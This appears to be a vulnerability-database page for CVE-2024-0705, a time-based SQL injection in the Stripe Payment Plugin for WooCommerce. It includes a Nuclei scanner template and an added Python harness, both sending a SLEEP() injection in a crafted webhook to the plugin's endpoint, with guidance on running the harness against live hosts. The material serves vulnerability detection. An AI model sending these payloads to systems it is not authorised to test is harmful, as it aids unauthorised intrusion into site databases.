Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection

Reported by ProjectDiscovery, 10 Feb 2026 11:24:37
Type: nuclei
Source: github.com

This is an unauthenticated SQL injection in the Stripe Payment Plugin for WooCommerce, versions up to and including 3.7.9. The injection point is the charge 'id' field (data.object.id) of a Stripe-style webhook event POSTed to the plugin's WooCommerce API endpoint at /?wc-api=wt_stripe; the value is used in a SQL query without escaping or a prepared statement, so no authentication or valid Stripe signature is needed to reach it.

Related

Reporter | Title | Published
GithubExploit | Exploit for Missing Authorization in Themegrill Colormag | 19 Jan 2024 22:30
Circl | CVE-2024-0705 | 19 Jan 2024 11:26
CNNVD | WordPress Plugin Stripe Payment Plugin for WooCommerce Security Vulnerability | 19 Jan 2024 00:00
CVE | CVE-2024-0705 | 19 Jan 2024 09:31
Cvelist | CVE-2024-0705 Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection | 19 Jan 2024 09:31
EUVD | EUVD-2024-16495 | 3 Oct 2025 20:07
NVD | CVE-2024-0705 | 19 Jan 2024 10:15
OSV | CVE-2024-0705 | 19 Jan 2024 10:15
Patchstack | WordPress Stripe Payment Gateway for WooCommerce Plugin <= 3.7.9 is vulnerable to SQL Injection | 19 Jan 2024 00:00
Prion | Sql injection | 19 Jan 2024 10:15

Code

id: CVE-2024-0705

info:
  name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.
  remediation: |
    Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0705
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
  tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "payment-gateway-stripe")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /?wc-api=wt_stripe HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950
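The template above declares a finding on a single request whose response takes at least 6 seconds, which is also what an overloaded host or a slow upstream produces. The Python harness below is an added example, not part of the Nuclei template or of the plugin; it rebuilds the same webhook payload and probe string, but pairs every SLEEP probe with a benign control request to the same endpoint and only reports the target as vulnerable when the difference, across several rounds, is close to the requested delay. The two stand-in targets at the bottom are constructed for offline use: the query shape in vulnerable_lookup_sql is a hypothetical illustration of an unprepared lookup (the page does not show the plugin's actual query), and fake_patched_target stands for a bound parameter where the id never reaches the SQL text.

```python
"""Time-based check for the wt_stripe webhook SQLi, with a control request (added example)."""
import json
import re
import time
from typing import Callable, Tuple

WEBHOOK_PATH = "/?wc-api=wt_stripe"           # endpoint used by the template
Transport = Callable[[str, bytes], int]        # (path, body) -> HTTP status code


def build_webhook_payload(charge_id: str, order_id: str = "999999") -> bytes:
    """Stripe-shaped charge.succeeded event; data.object.id carries the probe."""
    event = {
        "type": "charge.succeeded",
        "data": {"object": {"id": charge_id, "metadata": {"order_id": order_id}}},
    }
    return json.dumps(event).encode()


def sleep_probe(seconds: int, marker: str = "sqli_test") -> str:
    """Same shape as the template's probe: close the quoted id, nest SLEEP(), comment out the tail."""
    return f"{marker}' AND (SELECT 1 FROM (SELECT SLEEP({seconds}))a)#"


def timed_post(send: Transport, body: bytes) -> Tuple[int, float]:
    start = time.monotonic()
    status = send(WEBHOOK_PATH, body)
    return status, time.monotonic() - start


def check_time_based_sqli(send: Transport, delay: int = 6, rounds: int = 2,
                          min_ratio: float = 0.8) -> bool:
    """True only if, in every round, the SLEEP probe is ~delay seconds slower than its control.

    The control request is what the bare 'duration >= 6' matcher lacks: a host that is slow for
    every request fails this check, while a real SLEEP() shows up as a difference between the two.
    """
    for _ in range(rounds):
        st_ctl, t_ctl = timed_post(send, build_webhook_payload("sqli_test"))
        st_inj, t_inj = timed_post(send, build_webhook_payload(sleep_probe(delay)))
        if st_ctl != 200 or st_inj != 200:
            return False              # handler not reached; nothing to conclude
        if t_inj - t_ctl < delay * min_ratio:
            return False              # no delay attributable to the probe
    return True


# --- constructed stand-in targets for offline use; not the plugin's code ---
_SLEEP_RE = re.compile(r"SLEEP\((\d+)\)")


def vulnerable_lookup_sql(charge_id: str) -> str:
    # Hypothetical shape of an unprepared lookup: the id is interpolated into the SQL text.
    return ("SELECT post_id FROM wp_postmeta WHERE meta_key='_transaction_id' "
            f"AND meta_value='{charge_id}'")


def fake_vulnerable_target(path: str, body: bytes) -> int:
    if path != WEBHOOK_PATH:
        return 404
    event = json.loads(body)
    if event.get("type") != "charge.succeeded":
        return 200
    sql = vulnerable_lookup_sql(event["data"]["object"]["id"])
    match = _SLEEP_RE.search(sql)     # "execute" the query: honour SLEEP(n) as MySQL would
    if match:
        time.sleep(int(match.group(1)))
    return 200


def fake_patched_target(path: str, body: bytes) -> int:
    # Bound parameter: the id is data, never SQL, so SLEEP() in it has no effect.
    json.loads(body)
    return 200 if path == WEBHOOK_PATH else 404


if __name__ == "__main__":
    # Short delay so the offline demonstration finishes quickly; use 6 against a real host.
    print("vulnerable stand-in:", check_time_based_sqli(fake_vulnerable_target, delay=1))
    print("patched stand-in:   ", check_time_based_sqli(fake_patched_target, delay=1))
```

Against a live host, supply a `send` callable built on `http.client` or `requests` that POSTs `body` to `path` with `Content-Type: application/json` and returns the status code; keep `delay` at 6 and `rounds` at 2 or more, since a single delayed response is exactly the false positive the control request is there to catch.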


Scores, current as of 06 Feb 2026 15:02
Vulners AI Score: 6.1 (Medium risk)
CVSS 3.1: 7.5 - 9.8
EPSS: 0.02657
SSVC
9